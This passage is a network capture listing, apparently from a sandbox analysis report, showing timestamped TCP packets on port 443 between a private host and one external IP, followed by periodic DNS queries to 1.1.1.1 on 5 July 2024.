Jul 5, 2024 07:26:14.116018057 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.116205931 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.121090889 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.121375084 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.121428967 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.121664047 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.126511097 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.126785040 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.126838923 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.127125978 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.131896973 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.132107973 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.132153988 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.132401943 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.137284994 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.137561083 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.137619972 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.137856007 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.142676115 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.143058062 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.145438910 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.145719051 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.145776033 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.146040916 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.146114111 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.146306992 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.150773048 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.151009083 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.151066065 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.151304960 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.156265020 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.156462908 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.156528950 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.156804085 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.161619902 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.161905050 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.161967039 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.162256956 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.166984081 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.167273045 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.167334080 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.167562962 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.172257900 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.172477961 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.172528028 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.172717094 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.177450895 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.177737951 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.177798986 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.178069115 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.182477951 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.182678938 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.182733059 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.182914019 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.182950020 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.183208942 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.187381029 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.187617064 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.187670946 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.187886000 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.192338943 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.192569971 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.192626953 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.192811966 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.196953058 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.197199106 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.197252989 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.197489977 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.201826096 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.202079058 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.202133894 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.202364922 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.206657887 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.206878901 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.208939075 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.209211111 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.209269047 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.209548950 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.213732004 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.213984966 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.214036942 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.214303017 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.218589067 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.218878984 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.218951941 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.219144106 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.221563101 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.222229958 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.222290993 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.222615004 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.224332094 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.224586964 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.224661112 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.224970102 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.227287054 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.227483034 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.227554083 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.227736950 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.230242014 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.230488062 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.230556965 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.230809927 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.233014107 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.233417034 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.233493090 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.233670950 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.235673904 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.235933065 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.236006975 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.236160040 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.238610029 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.238807917 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.238862991 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.239094019 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.241535902 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.241713047 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.241780996 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.241940022 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.244286060 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.244548082 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.244616985 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.244776964 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.246599913 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.246776104 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.247860909 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.248039007 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.248085022 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.248320103 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.250674963 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.250916004 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.250972986 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.251172066 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.253058910 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.253361940 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.253395081 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.253612041 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.255722046 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.255903959 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.255937099 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.256120920 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.258193970 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.258418083 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.258441925 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.258655071 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.260843992 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.261023045 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.261044979 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.261230946 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.263386965 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.263607025 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.263627052 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.263796091 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.265908957 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.266103983 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.266119957 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.266359091 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.268471003 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.268678904 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.268695116 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.268846989 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.270967007 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.271122932 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.271143913 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.271291971 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.273459911 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.273969889 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.273988008 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.274401903 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.275901079 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.276050091 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.276066065 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.276241064 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.278353930 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.278718948 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.279583931 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.279834986 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.279849052 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.279988050 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.282020092 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.282277107 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.282294035 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.282433033 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.284425974 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.284838915 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.284857988 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.285275936 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.286731005 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.286892891 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.286909103 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.287106991 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.289074898 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.289376020 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.289391994 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.289751053 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.291448116 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.291624069 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.291637897 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.291779995 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.293730974 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.293909073 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.293919086 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.294117928 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.295981884 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.296159983 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.296170950 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.296401024 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.298199892 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.298540115 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.298549891 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.299096107 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.300494909 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.300712109 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.300721884 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.300962925 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.302711964 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.302855015 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.302865028 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.303010941 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.304922104 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.305078030 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.305087090 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.305391073 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.307154894 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.307327032 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.308232069 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.308373928 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.308387995 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.308609009 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.310493946 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.310642004 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.310651064 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.310883045 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.312586069 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.312689066 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.312736988 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.312750101 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.312757969 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.312905073 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.313013077 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.313013077 CEST	49777	443	192.168.11.20	142.250.191.129
Jul 5, 2024 07:26:14.313026905 CEST	443	49777	142.250.191.129	192.168.11.20
Jul 5, 2024 07:26:14.313183069 CEST	49777	443	192.168.11.20	142.250.191.129

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 5, 2024 07:26:11.574145079 CEST	63129	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:26:11.693717957 CEST	53	63129	1.1.1.1	192.168.11.20
Jul 5, 2024 07:26:12.232944965 CEST	64293	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:26:12.352868080 CEST	53	64293	1.1.1.1	192.168.11.20
Jul 5, 2024 07:26:14.761617899 CEST	62074	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:26:14.912834883 CEST	53	62074	1.1.1.1	192.168.11.20
Jul 5, 2024 07:26:14.942125082 CEST	55001	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:26:15.092091084 CEST	53	55001	1.1.1.1	192.168.11.20
Jul 5, 2024 07:26:19.111713886 CEST	57189	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:26:19.763504982 CEST	53	57189	1.1.1.1	192.168.11.20
Jul 5, 2024 07:26:19.764436007 CEST	63964	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:26:19.884185076 CEST	53	63964	1.1.1.1	192.168.11.20
Jul 5, 2024 07:26:23.891860962 CEST	53422	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:26:24.042646885 CEST	53	53422	1.1.1.1	192.168.11.20
Jul 5, 2024 07:26:28.047240973 CEST	60636	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:26:28.197731018 CEST	53	60636	1.1.1.1	192.168.11.20
Jul 5, 2024 07:26:28.198390961 CEST	52627	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:26:28.349467993 CEST	53	52627	1.1.1.1	192.168.11.20
Jul 5, 2024 07:26:32.358983040 CEST	59926	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:26:32.512650967 CEST	53	59926	1.1.1.1	192.168.11.20
Jul 5, 2024 07:26:32.513267994 CEST	59847	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:26:32.665925980 CEST	53	59847	1.1.1.1	192.168.11.20
Jul 5, 2024 07:26:36.670463085 CEST	53272	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:26:36.821645021 CEST	53	53272	1.1.1.1	192.168.11.20
Jul 5, 2024 07:26:40.825817108 CEST	53052	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:26:40.978877068 CEST	53	53052	1.1.1.1	192.168.11.20
Jul 5, 2024 07:26:40.979696035 CEST	51992	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:26:41.132599115 CEST	53	51992	1.1.1.1	192.168.11.20
Jul 5, 2024 07:26:45.138207912 CEST	62463	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:26:45.290874004 CEST	53	62463	1.1.1.1	192.168.11.20
Jul 5, 2024 07:26:45.291476965 CEST	56240	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:26:45.411761045 CEST	53	56240	1.1.1.1	192.168.11.20
Jul 5, 2024 07:26:49.417490005 CEST	51396	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:26:49.569017887 CEST	53	51396	1.1.1.1	192.168.11.20
Jul 5, 2024 07:26:53.573075056 CEST	62804	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:26:53.723236084 CEST	53	62804	1.1.1.1	192.168.11.20
Jul 5, 2024 07:26:53.723932028 CEST	52224	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:26:53.875667095 CEST	53	52224	1.1.1.1	192.168.11.20
Jul 5, 2024 07:26:57.619803905 CEST	52904	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:26:57.778305054 CEST	53	52904	1.1.1.1	192.168.11.20
Jul 5, 2024 07:27:01.024384022 CEST	61660	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:27:01.176511049 CEST	53	61660	1.1.1.1	192.168.11.20
Jul 5, 2024 07:27:01.177186012 CEST	59179	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:27:01.375874043 CEST	53	59179	1.1.1.1	192.168.11.20
Jul 5, 2024 07:27:04.195566893 CEST	63756	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:27:04.347569942 CEST	53	63756	1.1.1.1	192.168.11.20
Jul 5, 2024 07:27:06.788978100 CEST	57831	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:27:06.908751011 CEST	53	57831	1.1.1.1	192.168.11.20
Jul 5, 2024 07:27:06.909369946 CEST	60477	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:27:07.061808109 CEST	53	60477	1.1.1.1	192.168.11.20
Jul 5, 2024 07:27:09.178945065 CEST	54372	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:27:09.346240997 CEST	53	54372	1.1.1.1	192.168.11.20
Jul 5, 2024 07:27:13.349919081 CEST	59179	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:27:13.470650911 CEST	53	59179	1.1.1.1	192.168.11.20
Jul 5, 2024 07:27:13.471371889 CEST	64453	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:27:13.629506111 CEST	53	64453	1.1.1.1	192.168.11.20
Jul 5, 2024 07:27:17.645929098 CEST	63994	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:27:17.801103115 CEST	53	63994	1.1.1.1	192.168.11.20
Jul 5, 2024 07:27:21.816977024 CEST	56486	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:27:21.937886000 CEST	53	56486	1.1.1.1	192.168.11.20
Jul 5, 2024 07:27:21.938502073 CEST	54486	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:27:22.059279919 CEST	53	54486	1.1.1.1	192.168.11.20
Jul 5, 2024 07:27:26.065880060 CEST	53682	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:27:26.193334103 CEST	53	53682	1.1.1.1	192.168.11.20
Jul 5, 2024 07:27:30.205653906 CEST	58636	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:27:30.356297970 CEST	53	58636	1.1.1.1	192.168.11.20
Jul 5, 2024 07:27:30.356949091 CEST	63988	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:27:30.477890015 CEST	53	63988	1.1.1.1	192.168.11.20
Jul 5, 2024 07:27:34.486049891 CEST	63319	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:27:34.636965990 CEST	53	63319	1.1.1.1	192.168.11.20
Jul 5, 2024 07:27:38.641545057 CEST	54004	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:27:38.792823076 CEST	53	54004	1.1.1.1	192.168.11.20
Jul 5, 2024 07:27:38.793565035 CEST	65151	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:27:38.914048910 CEST	53	65151	1.1.1.1	192.168.11.20
Jul 5, 2024 07:27:42.921611071 CEST	54814	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:27:43.089795113 CEST	53	54814	1.1.1.1	192.168.11.20
Jul 5, 2024 07:27:47.092721939 CEST	49469	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:27:47.212997913 CEST	53	49469	1.1.1.1	192.168.11.20
Jul 5, 2024 07:27:47.213579893 CEST	58887	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:27:47.335232019 CEST	53	58887	1.1.1.1	192.168.11.20
Jul 5, 2024 07:27:51.076275110 CEST	55966	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:27:51.197029114 CEST	53	55966	1.1.1.1	192.168.11.20
Jul 5, 2024 07:27:54.435360909 CEST	51925	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:27:54.566478968 CEST	53	51925	1.1.1.1	192.168.11.20
Jul 5, 2024 07:27:54.574064970 CEST	53742	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:27:54.694252014 CEST	53	53742	1.1.1.1	192.168.11.20
Jul 5, 2024 07:27:57.514396906 CEST	49741	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:27:57.635227919 CEST	53	49741	1.1.1.1	192.168.11.20
Jul 5, 2024 07:28:00.075546980 CEST	65129	53	192.168.11.20	1.1.1.1
Jul 5, 2024 07:28:00.196726084 CEST	53	65129	1.1.1.1	192.168.11.20
